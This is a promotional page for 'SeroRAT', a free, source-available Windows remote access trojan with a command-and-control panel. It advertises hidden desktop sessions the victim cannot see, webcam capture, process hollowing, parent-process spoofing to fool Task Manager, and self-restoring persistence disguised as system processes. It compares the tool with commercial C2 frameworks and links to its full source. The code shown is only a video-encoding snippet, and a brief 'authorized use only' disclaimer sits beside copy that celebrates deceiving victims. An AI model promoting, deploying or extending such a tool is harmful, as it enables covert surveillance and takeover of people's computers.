$ source available · authorized use only · free
SeroRAT | C2 Desktop App for Windows
HVNC, DXGI remote desktop H.264 up to 144fps+, remote webcam via DirectShow, process hollowing with PPID spoof, NativeAOT stub — 40+ features. Everything the expensive ones have. None of the price tag.
HVNC creates a completely isolated Windows desktop session — invisible to the target. Chrome, Edge, Firefox, Brave, Vivaldi, Opera, Opera GX, Telegram, Discord, AyuGram and Explorer launch directly into the shadow session. The victim sees nothing. You see everything.
Each browser gets --start-maximized and fills the HVNC frame. Mouse and keyboard forwarded with pixel-perfect accuracy. Clipboard synced on demand.
The stream is encoded in real time using the Windows Media Foundation H.264 MFT — no FFmpeg, no external codec. Frames are captured from the shadow desktop, converted BGRA→NV12 on the fly, and compressed to H.264 Baseline Annex-B with MF_LOW_LATENCY mode for near-zero encoder delay. Falls back to JPEG if MF is unavailable.
No new file is dropped — the existing PE is mapped via NtCreateSection(SEC_IMAGE) into the target via NtMapViewOfSection — Windows resolves relocations and IAT automatically. The thread's RIP is redirected to the new entry point, then resumed.
PPID spoofing via UpdateProcThreadAttribute makes the injected process appear as a child of explorer.exe or winlogon.exe. Task Manager, Process Explorer — they see nothing suspicious.
Built on WPF with DevExpress 25.2. A persistent sidebar provides navigation — an icon rail on the left with labelled panels for each feature group. The entire UI adapts to the active theme in real time.
A built-in theme picker offers 20+ presets — Sero Dark (default), DevExpress Dark, Office 2019 family, Visual Studio 2013 themes, The Bezier, and more. Themes apply live with no restart. Interface language switchable across 18 locales.
What others charge for the same thing — often worse, and closed to inspect.
| Cobalt Strike | $5,000 / yr | commercial, closed source |
| Brute Ratel | $2,500 / yr | commercial, closed source |
| PureRAT | $2,000 lifetime | reversed & leaked anyway |
| SeroRAT | $0 — open source | Source available, full code on GitLab |
No mocked-up demos. Actual captures from the server.
Builder NativeAOT stub
Client detail view
Service manager
Window Notify
The details that separate a demo from something you'd actually deploy.
Shared-key auth on every packet. 3s heartbeat with RTT measurement. Multi-host auto-reconnect with configurable round-robin delay.
UpdateProcThreadAttribute sets the injected process parent to explorer.exe or winlogon.exe depending on elevation level.
4 guardian processes in dllhost/SearchProtocolHost with PPID spoofing, staggered 800ms apart. File lock + FileSystemWatcher for instant restore.
// Windows MF H.264 MFT — no FFmpeg, NativeAOT COM vtable
CoCreateInstance(ref CLSID_CMSH264EncoderMFT,
0, CLSCTX_INPROC_SERVER,
ref IID_IMFTransform, out _pTransform);
// MF_LOW_LATENCY: zero encoder buffer delay
Set32(pAttribs, MF_LOW_LATENCY, 1);
// Output: H.264 Baseline Annex-B
SetG(pOut, MF_MT_SUBTYPE, MFVideoFormat_H264);
Set32(pOut, MF_MT_MPEG2_PROFILE, 66); // Baseline
// Input: NV12 (BGRA→NV12 BT.601 done in-stub)
SetG(pIn, MF_MT_SUBTYPE, MFVideoFormat_NV12);
// Encode frame → Annex-B NAL → base64 → TLS packet
byte[] nal = _h264Enc.Encode(bgraBits, stride);
_send?.Invoke(PacketType.RdpH264Frame, ToJson(nal));
People who built this.
Fork it. Build on it. Make it yours.
Just use it on systems you have authorization for.
For authorized use only — red team engagements, security research, CTF. You are responsible for where you point it.